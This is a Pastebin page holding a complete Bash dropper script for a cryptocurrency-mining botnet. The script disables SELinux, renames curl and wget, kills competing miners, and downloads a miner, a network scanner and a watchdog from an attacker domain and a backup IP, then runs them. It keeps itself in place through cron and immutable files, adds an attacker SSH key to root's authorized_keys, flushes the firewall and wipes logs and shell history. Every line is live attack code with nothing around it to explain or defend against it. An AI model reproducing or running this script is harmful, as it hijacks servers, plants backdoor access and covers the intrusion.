API tools faq
paste
internetweather

http://185.181.10.234/E5DB0E07C3D7BE80V520/init.sh

internetweather
Jul 18th, 2019
593
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Bash 14.22 KB | None | 0 0
raw download clone embed print report
  1. #!/bin/sh
  2. setenforce 0 2>dev/null
  3. echo SELINUX=disabled > /etc/sysconfig/selinux 2>/dev/null
  4. sync && echo 3 >/proc/sys/vm/drop_caches
  5. crondir='/var/spool/cron/'"$USER"
  6. cont=`cat ${crondir}`
  7. ssht=`cat /root/.ssh/authorized_keys`
  8. echo 1 > /etc/sysupdates
  9. rtdir="/etc/sysupdates"
  10. bbdir="/usr/bin/curl"
  11. bbdira="/usr/bin/cur"
  12. ccdir="/usr/bin/wget"
  13. ccdira="/usr/bin/wge"
  14. mv /usr/bin/wget /usr/bin/get
  15. mv /usr/bin/xget /usr/bin/get
  16. mv /usr/bin/get /usr/bin/wge
  17. mv /usr/bin/curl /usr/bin/url
  18. mv /usr/bin/xurl /usr/bin/url
  19. mv /usr/bin/url /usr/bin/cur
  20. miner_url="https://de.gsearch.com.de/api/sysupdate"
  21. miner_url_backup="http://185.181.10.234/E5DB0E07C3D7BE80V520/sysupdate"
  22. miner_size="854364"
  23. sh_url="https://de.gsearch.com.de/api/update.sh"
  24. sh_url_backup="http://185.181.10.234/E5DB0E07C3D7BE80V520/update.sh"
  25. config_url="https://de.gsearch.com.de/api/config.json"
  26. config_url_backup="http://185.181.10.234/E5DB0E07C3D7BE80V520/config.json"
  27. config_size="4954"
  28. scan_url="https://de.gsearch.com.de/api/networkservice"
  29. scan_url_backup="http://185.181.10.234/E5DB0E07C3D7BE80V520/networkservice"
  30. scan_size="2584072"
  31. watchdog_url="https://de.gsearch.com.de/api/sysguard"
  32. watchdog_url_backup="http://185.181.10.234/E5DB0E07C3D7BE80V520/sysguard"
  33. watchdog_size="1929480"
  34.  
  35. kill_miner_proc()
  36. {
  37.     ps auxf|grep -v grep|grep "mine.moneropool.com"|awk '{print $2}'|xargs kill -9
  38.     ps auxf|grep -v grep|grep "pool.t00ls.ru"|awk '{print $2}'|xargs kill -9
  39.     ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:8080"|awk '{print $2}'|xargs kill -9
  40.     ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:3333"|awk '{print $2}'|xargs kill -9
  41.     ps auxf|grep -v grep|grep "zhuabcn@yahoo.com"|awk '{print $2}'|xargs kill -9
  42.     ps auxf|grep -v grep|grep "monerohash.com"|awk '{print $2}'|xargs kill -9
  43.     ps auxf|grep -v grep|grep "/tmp/a7b104c270"|awk '{print $2}'|xargs kill -9
  44.     ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:6666"|awk '{print $2}'|xargs kill -9
  45.     ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:7777"|awk '{print $2}'|xargs kill -9
  46.     ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:443"|awk '{print $2}'|xargs kill -9
  47.     ps auxf|grep -v grep|grep "stratum.f2pool.com:8888"|awk '{print $2}'|xargs kill -9
  48.     ps auxf|grep -v grep|grep "xmrpool.eu" | awk '{print $2}'|xargs kill -9
  49.     ps auxf|grep xiaoyao| awk '{print $2}'|xargs kill -9
  50.     ps auxf|grep xiaoxue| awk '{print $2}'|xargs kill -9
  51.     ps ax|grep var|grep lib|grep jenkins|grep -v httpPort|grep -v headless|grep "\-c"|xargs kill -9
  52.     ps ax|grep -o './[0-9]* -c'| xargs pkill -f
  53.     pkill -f biosetjenkins
  54.     pkill -f Loopback
  55.     pkill -f apaceha
  56.     pkill -f cryptonight
  57.     pkill -f stratum
  58.     pkill -f mixnerdx
  59.     pkill -f performedl
  60.     pkill -f JnKihGjn
  61.     pkill -f irqba2anc1
  62.     pkill -f irqba5xnc1
  63.     pkill -f irqbnc1
  64.     pkill -f ir29xc1
  65.     pkill -f conns
  66.     pkill -f irqbalance
  67.     pkill -f crypto-pool
  68.     pkill -f minexmr
  69.     pkill -f XJnRj
  70.     pkill -f mgwsl
  71.     pkill -f pythno
  72.     pkill -f jweri
  73.     pkill -f lx26
  74.     pkill -f NXLAi
  75.     pkill -f BI5zj
  76.     pkill -f askdljlqw
  77.     pkill -f minerd
  78.     pkill -f minergate
  79.     pkill -f Guard.sh
  80.     pkill -f ysaydh
  81.     pkill -f bonns
  82.     pkill -f donns
  83.     pkill -f kxjd
  84.     pkill -f Duck.sh
  85.     pkill -f bonn.sh
  86.     pkill -f conn.sh
  87.     pkill -f kworker34
  88.     pkill -f kw.sh
  89.     pkill -f pro.sh
  90.     pkill -f polkitd
  91.     pkill -f acpid
  92.     pkill -f icb5o
  93.     pkill -f nopxi
  94.     pkill -f irqbalanc1
  95.     pkill -f minerd
  96.     pkill -f i586
  97.     pkill -f gddr
  98.     pkill -f mstxmr
  99.     pkill -f ddg.2011
  100.     pkill -f wnTKYg
  101.     pkill -f deamon
  102.     pkill -f disk_genius
  103.     pkill -f sourplum
  104.     pkill -f polkitd
  105.     pkill -f nanoWatch
  106.     pkill -f zigw
  107.     pkill -f devtool
  108.     pkill -f systemctI
  109.     pkill -f WmiPrwSe
  110.         pkill -f sysguard
  111.             pkill -f sysupdate
  112.                 pkill -f networkservice
  113.     crontab -r
  114.     rm -rf /var/spool/cron/*
  115. }
  116. downloads()
  117. {
  118.     if [ -f "/usr/bin/curl" ]
  119.     then
  120.     echo $1,$2
  121.         http_code=`curl -I -m 10 -o /dev/null -s -w %{http_code} $1`
  122.         if [ "$http_code" -eq "200" ]
  123.         then
  124.             curl --connect-timeout 10 --retry 100 $1 > $2
  125.         elif [ "$http_code" -eq "405" ]
  126.         then
  127.             curl --connect-timeout 10 --retry 100 $1 > $2
  128.         else
  129.             curl --connect-timeout 10 --retry 100 $3 > $2
  130.         fi
  131.     elif [ -f "/usr/bin/cur" ]
  132.     then
  133.         http_code = `cur -I -m 10 -o /dev/null -s -w %{http_code} $1`
  134.         if [ "$http_code" -eq "200" ]
  135.         then
  136.             cur --connect-timeout 10 --retry 100 $1 > $2
  137.         elif [ "$http_code" -eq "405" ]
  138.         then
  139.             cur --connect-timeout 10 --retry 100 $1 > $2
  140.         else
  141.             cur --connect-timeout 10 --retry 100 $3 > $2
  142.         fi
  143.     elif [ -f "/usr/bin/wget" ]
  144.     then
  145.         wget --timeout=10 --tries=100 -O $2 $1
  146.         if [ $? -ne 0 ]
  147.     then
  148.         wget --timeout=10 --tries=100 -O $2 $3
  149.         fi
  150.     elif [ -f "/usr/bin/wge" ]
  151.     then
  152.         wge --timeout=10 --tries=100 -O $2 $1
  153.         if [ $? -eq 0 ]
  154.         then
  155.             wge --timeout=10 --tries=100 -O $2 $3
  156.         fi
  157.     fi
  158. }
  159.  
  160. kill_sus_proc()
  161. {
  162.     ps axf -o "pid"|while read procid
  163.     do
  164.             ls -l /proc/$procid/exe | grep /tmp
  165.             if [ $? -ne 1 ]
  166.             then
  167.                     cat /proc/$procid/cmdline| grep -a -E "sysguard|update.sh|sysupdate|networkservice"
  168.                     if [ $? -ne 0 ]
  169.                     then
  170.                             kill -9 $procid
  171.                     else
  172.                             echo "don't kill"
  173.                     fi
  174.             fi
  175.     done
  176.     ps axf -o "pid %cpu" | awk '{if($2>=40.0) print $1}' | while read procid
  177.     do
  178.             cat /proc/$procid/cmdline| grep -a -E "sysguard|update.sh|sysupdate|networkservice"
  179.             if [ $? -ne 0 ]
  180.             then
  181.                     kill -9 $procid
  182.             else
  183.                     echo "don't kill"
  184.             fi
  185.     done
  186. }
  187.  
  188. kill_miner_proc
  189. kill_sus_proc
  190.  
  191. if [ -f "$rtdir" ]
  192. then
  193.         echo "i am root"
  194.         echo "goto 1" >> /etc/sysupdate
  195.         chattr -i /etc/sysupdate*
  196.         chattr -i /etc/config.json*
  197.         chattr -i /etc/update.sh*
  198.         chattr -i /root/.ssh/authorized_keys*
  199.         chattr -i /etc/networkservice
  200.     if [ ! -f "/usr/bin/crontab" ]
  201.         then
  202.             echo "*/30 * * * * sh /etc/update.sh >/dev/null 2>&1" >> ${crondir}
  203.         else
  204.             [[ $cont =~ "update.sh" ]] || (crontab -l ; echo "*/30 * * * * sh /etc/update.sh >/dev/null 2>&1") | crontab -
  205.     fi
  206.         chmod 700 /root/.ssh/
  207.         echo >> /root/.ssh/authorized_keys
  208.         chmod 600 root/.ssh/authorized_keys
  209.         echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC9WKiJ7yQ6HcafmwzDMv1RKxPdJI/oeXUWDNW1MrWiQNvKeSeSSdZ6NaYVqfSJgXUSgiQbktTo8Fhv43R9FWDvVhSrwPoFBz9SAfgO06jc0M2kGVNS9J2sLJdUB9u1KxY5IOzqG4QTgZ6LP2UUWLG7TGMpkbK7z6G8HAZx7u3l5+Vc82dKtI0zb/ohYSBb7pK/2QFeVa22L+4IDrEXmlv3mOvyH5DwCh3HcHjtDPrAhFqGVyFZBsRZbQVlrPfsxXH2bOLc1PMrK1oG8dyk8gY8m4iZfr9ZDGxs4gAqdWtBQNIN8cvz4SI+Jv9fvayMH7f+Kl2yXiHN5oD9BVTkdIWX root@u17" >> /root/.ssh/authorized_keys
  210.        
  211.    
  212.         cfg="/etc/config.json"
  213.         file="/etc/sysupdate"
  214.  
  215.     if [-f "/etc/config.json" ]
  216.     then
  217.         filesize_config=`ls -l /etc/config.json | awk '{ print $5 }'`
  218.         if [ "$filesize_config" -ne "$config_size" ]   
  219.         then
  220.             pkill -f sysupdate
  221.             rm /etc/config.json
  222.             downloads $config_url /etc/config.json $config_url_backup
  223.         else
  224.             echo "no need download"
  225.         fi
  226.     else
  227.         downloads $config_url /etc/config.json $config_url_backup
  228.     fi
  229.    
  230.     if [ -f "/etc/sysupdate" ]
  231.     then
  232.             filesize1=`ls -l /etc/sysupdate | awk '{ print $5 }'`
  233.             if [ "$filesize1" -ne "$miner_size" ]
  234.             then
  235.                 pkill -f sysupdate
  236.                 rm /etc/sysupdate
  237.                 downloads $miner_url /etc/sysupdate $miner_url_backup
  238.             else
  239.                 echo "not need download"
  240.             fi
  241.     else
  242.             downloads $miner_url /etc/sysupdate $miner_url_backup
  243.     fi
  244.    
  245.     if [ -f "/etc/sysguard" ]
  246.     then
  247.             filesize1=`ls -l /etc/sysguard | awk '{ print $5 }'`
  248.             if [ "$filesize1" -ne "$watchdog_size" ]
  249.             then
  250.                 pkill -f sysguard
  251.                 rm /etc/sysguard
  252.                 downloads $watchdog_url /etc/sysguard $watchdog_url_backup
  253.             else
  254.                 echo "not need download"
  255.             fi
  256.     else
  257.             downloads $watchdog_url /etc/sysguard $watchdog_url_backup
  258.     fi
  259.  
  260.     downloads $sh_url /etc/update.sh $sh_url_backup
  261.  
  262.     if [ -f "/etc/networkservice" ]
  263.     then
  264.             filesize2=`ls -l /etc/networkservice | awk '{ print $5 }'`
  265.             if [ "$filesize2" -ne "$scan_size" ]
  266.             then
  267.                 pkill -f networkservice
  268.                 rm /etc/networkservice
  269.                 downloads  $scan_url /etc/networkservice $scan_url_backup
  270.             else
  271.                 echo "not need download"
  272.             fi
  273.     else
  274.             downloads $scan_url /etc/networkservice $scan_url_backup
  275.     fi
  276.  
  277.     chmod 777 /etc/sysupdate
  278.     ps -fe|grep sysupdate |grep -v grep
  279.     if [ $? -ne 0 ]
  280.     then
  281.                 cd /etc
  282.                 echo "not root runing"
  283.                 sleep 5s
  284.                 ./sysupdate &
  285.     else
  286.                 echo "root runing....."
  287.     fi
  288.     chmod 777 /etc/networkservice
  289.     ps -fe|grep networkservice |grep -v grep
  290.     if [ $? -ne 0 ]
  291.     then
  292.                 cd /etc
  293.                 echo "not roots runing"
  294.                 sleep 5s
  295.                 ./networkservice &
  296.     else
  297.                 echo "roots runing....."
  298.     fi
  299.     chmod 777 /etc/sysguard
  300.     ps -fe|grep sysguard |grep -v grep
  301.         if [ $? -ne 0 ]
  302.             then
  303.                 echo "not tmps runing"
  304.                 cd /etc
  305.                 chmod 777 sysguard
  306.                 sleep 5s
  307.                 ./sysguard &
  308.             else
  309.                 echo "roots runing....."
  310.         fi
  311.  
  312.  
  313.     chmod 777 /etc/sysupdate
  314.     chattr +i /etc/sysupdate
  315.     chmod 777 /etc/networkservice
  316.     chattr +i /etc/networkservice
  317.     chmod 777 /etc/config.json
  318.     chattr +i /etc/config.json
  319.     chmod 777 /etc/update.sh
  320.     chattr +i /etc/update.sh
  321.     chmod 777 /root/.ssh/authorized_keys
  322.     chattr +i /root/.ssh/authorized_keys
  323. else
  324.     echo "goto 1" > /tmp/sysupdates
  325.     chattr -i /tmp/sysupdate*
  326.     chattr -i /tmp/networkservice
  327.     chattr -i /tmp/config.json*
  328.     chattr -i /tmp/update.sh*
  329.        
  330.     if [ ! -f "/usr/bin/crontab" ]
  331.     then
  332.             echo "*/30 * * * * sh /tmp/update.sh >/dev/null 2>&1" >> ${crondir}
  333.     else
  334.             [[ $cont =~ "update.sh" ]] || (crontab -l ; echo "*/30 * * * * sh /tmp/update.sh >/dev/null 2>&1") | crontab -
  335.     fi
  336.  
  337.     if [ -f "/tmp/config.json" ]
  338.     then
  339.         filesize1=`ls -l /tmp/config.json | awk '{ print $5 }'`
  340.         if [ "$filesize1" -ne "$config_size" ]
  341.         then
  342.             pkill -f sysupdate
  343.             rm /tmp/config.json
  344.             downloads  $config_url /tmp/config.json $config_url_backup
  345.         else
  346.             echo "no need download"
  347.         fi
  348.     else
  349.         downloads $config_url /tmp/config.json $config_url_backup
  350.     fi
  351.  
  352.     if [ -f "/tmp/sysupdate" ]
  353.     then    
  354.         filesize1=`ls -l /tmp/sysupdate | awk '{ print $5 }'`
  355.         if [ "$filesize1" -ne "$miner_size" ]
  356.         then
  357.                 pkill -f sysupdate
  358.                 rm /tmp/sysupdate
  359.                 downloads $miner_url /tmp/sysupdate $miner_url_backup
  360.         else
  361.                 echo "no need download"
  362.         fi
  363.     else
  364.             downloads $miner_url /tmp/sysupdate $miner_url_backup
  365.     fi
  366.  
  367.     if [ -f "/tmp/sysguard" ]
  368.     then
  369.             filesize1=`ls -l /tmp/sysguard | awk '{ print $5 }'`
  370.             if [ "$filesize1" -ne "$watchdog_size" ]
  371.             then
  372.                 pkill -f sysguard
  373.                 rm /tmp/sysguard
  374.                 downloads $watchdog_url /tmp/sysguard $watchdog_url_backup
  375.             else
  376.                 echo "not need download"
  377.             fi
  378.     else
  379.             downloads $watchdog_url /tmp/sysguard $watchdog_url_backup
  380.     fi
  381.  
  382.     echo "i am here"
  383.     downloads $sh_url /tmp/update.sh $sh_url_backup
  384.  
  385.     if [ -f "/tmp/networkservice" ]
  386.     then
  387.         filesize2=`ls -l /tmp/networkservice | awk '{ print $5 }'`
  388.         if [ "$filesize2" -ne "$scan_size" ]  
  389.         then
  390.                 pkill -f networkservice
  391.                 rm /tmp/networkservice
  392.                 downloads $scan_url /tmp/networkservice $scan_url_backup
  393.         else
  394.                 echo "no need download"
  395.         fi
  396.     else
  397.             downloads $scan_url /tmp/networkservice $scan_url_backup
  398.     fi
  399.  
  400.     ps -fe|grep sysupdate |grep -v grep
  401.         if [ $? -ne 0 ]
  402.             then
  403.                 echo "not tmp runing"
  404.                 cd /tmp
  405.                 chmod 777 sysupdate
  406.                 sleep 5s
  407.                 ./sysupdate &
  408.             else
  409.                 echo "tmp runing....."
  410.         fi
  411.     ps -fe|grep networkservice |grep -v grep
  412.         if [ $? -ne 0 ]
  413.             then
  414.                 echo "not tmps runing"
  415.                 cd /tmp
  416.                 chmod 777 networkservice
  417.                 sleep 5s
  418.                 ./networkservice &
  419.             else
  420.                 echo "tmps runing....."
  421.         fi
  422.  
  423.     ps -fe|grep sysguard |grep -v grep
  424.         if [ $? -ne 0 ]
  425.             then
  426.                 echo "not tmps runing"
  427.                 cd /tmp
  428.                 chmod 777 sysguard
  429.                 sleep 5s
  430.                 ./sysguard &
  431.             else
  432.                 echo "tmps runing....."
  433.         fi
  434.  
  435.     chmod 777 /tmp/sysupdate
  436.     chattr +i /tmp/sysupdate
  437.     chmod 777 /tmp/networkservice
  438.     chattr +i /tmp/networkservice
  439.     chmod 777 /tmp/sysguard
  440.     chattr +i /tmp/sysguard
  441.     chmod 777 /tmp/update.sh
  442.     chattr +i /tmp/update.sh
  443.     chmod 777 /tmp/config.json
  444.     chattr +i /tmp/config.json
  445.        
  446. fi
  447. iptables -F
  448. iptables -X
  449. iptables -A OUTPUT -p tcp --dport 3333 -j DROP
  450. iptables -A OUTPUT -p tcp --dport 5555 -j DROP
  451. iptables -A OUTPUT -p tcp --dport 7777 -j DROP
  452. iptables -A OUTPUT -p tcp --dport 9999 -j DROP
  453. iptables -I INPUT -s 43.245.222.57 -j DROP
  454. service iptables reload
  455. ps auxf|grep -v grep|grep "stratum"|awk '{print $2}'|xargs kill -9
  456. history -c
  457. echo > /var/spool/mail/root
  458. echo > /var/log/wtmp
  459. echo > /var/log/secure
  460. echo > /root/.bash_history
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!